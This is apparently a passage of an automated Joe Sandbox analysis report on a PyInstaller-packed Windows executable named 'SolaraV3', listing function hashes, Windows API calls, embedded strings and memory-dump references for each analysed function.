                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction ID: cfd60cbe75411257a8d0a185084403d822d742e250b1b9291541c7ddb6f9d44a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C831D623708A4546E721AB26B8102AF66A1BF88799F410137EF4ED3B59DF3DD557C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                                                                              • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                                                                              • API String ID: 2050058302-1471988776
                                                                                                                                                                                                                              • Opcode ID: 1e5013941710e139a7b14bb4f35b09f2f5b08f6e489bda408db967ad74f9ffa0
                                                                                                                                                                                                                              • Instruction ID: 8e3d1ce40b541c81f05b0b17489462dee582d5459d2de3f5915451b579be3164
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e5013941710e139a7b14bb4f35b09f2f5b08f6e489bda408db967ad74f9ffa0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79A168B6A09B0286EA20DF36E450E6963A4FB54B84F04C436DA8F877B5EF3CE455C711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                                                              • String ID: OPENSSL_ia32cap$~$~$~$~
                                                                                                                                                                                                                              • API String ID: 1431749950-1981414212
                                                                                                                                                                                                                              • Opcode ID: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
                                                                                                                                                                                                                              • Instruction ID: 5613ee4b77a52d6824f95ecc86086c2dd05565ab80572e3b150fdc758254b317
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5417AAAE0DA5396E7109B21E840AB463A0FB44B80F54C535ED5FCBBB4EF3DE4859700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD4D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD5B
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD85
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDF3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDFF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction ID: e0a2312b60a5bac6d4238bef9f6bac598989c5c65bdd497a9777e53801983b32
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9310521B1A74AD1EE229B03A4116BD63A4FF18BA0F494137ED1E87380DF3DE062D304
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007B5630
                                                                                                                                                                                                                              • String ID: MASK:$default$nombstr$pkix$utf8only
                                                                                                                                                                                                                              • API String ID: 2248877218-3483942737
                                                                                                                                                                                                                              • Opcode ID: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
                                                                                                                                                                                                                              • Instruction ID: 27b3910076cf3bdd421b4f26e244f64d29d98b1db07ea2a16119ea8e40f722a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A431A0A2A1868186EB518B38E550FB937A0FF45750F849132EB5F876B1EE2CE495C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6DC70351A,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC702AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction ID: 99a65243a18f80446305b0d7d622b58de2353c1983ade51469d38b1ea24c56d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21B272A18B8542E7209B55F8517EAA3A4FB883C4F400137FE8D83659DF3CD1568740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                              • Instruction ID: 7dcb2c5d61f5f7b020b30dc55f8cc9d1aceded58e25c981b5d6252f48f0b925e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88215E31A0C64A42EB208B56F55426EE3B0FF857A0F540336EA6D83BE9DE7DD4668700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                              • Instruction ID: 5d33a0b0013c490226e7d7751f4eb25a233001fb05fab278941ab6e8e72b7e22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA219D30F0C64A86FA6963399A7113DA2425F447F0F116736E93EC7AC6DE2CB4639300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction ID: e0eb0081e8cb1c4685abdfb09c0e79dca2cc258b0cd8ac2bead7fa3454d9d654
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211B921B18B4986E7608B52F85532DA3A0FB88FE4F044235E96EC7794DF3CD8258740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708EFD
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708F5A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708FE5
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709044
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709055
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC70906A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                              • Instruction ID: f4adc7efcbf92c2efcfbd135f9b0ccb1762818622b6cbbf5b503a55482c01894
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44418F62A1968A81EA309B13E5002BE73A4FB85BC4F444136DF9D97799DE3EE523D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetTokenInformation.ADVAPI32 ref: 00007FF6DC7085C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetLastError.KERNEL32 ref: 00007FF6DC7085D2
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: GetTokenInformation.ADVAPI32 ref: 00007FF6DC708612
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC708570: CloseHandle.KERNEL32 ref: 00007FF6DC708646
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC70916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC709175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction ID: a149f3f94df4df9367260d828c308a77d8474707443fd911e8975ba06f9d8111
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0214D21A0864A81E610AB11E4252EE6361FF88780F544037EA4D83BD6DF3DD966D740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B2D7
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B30D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B33A
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B34B
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B35C
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B377
                                                                                                                                                                                                                              Memory Dump Source
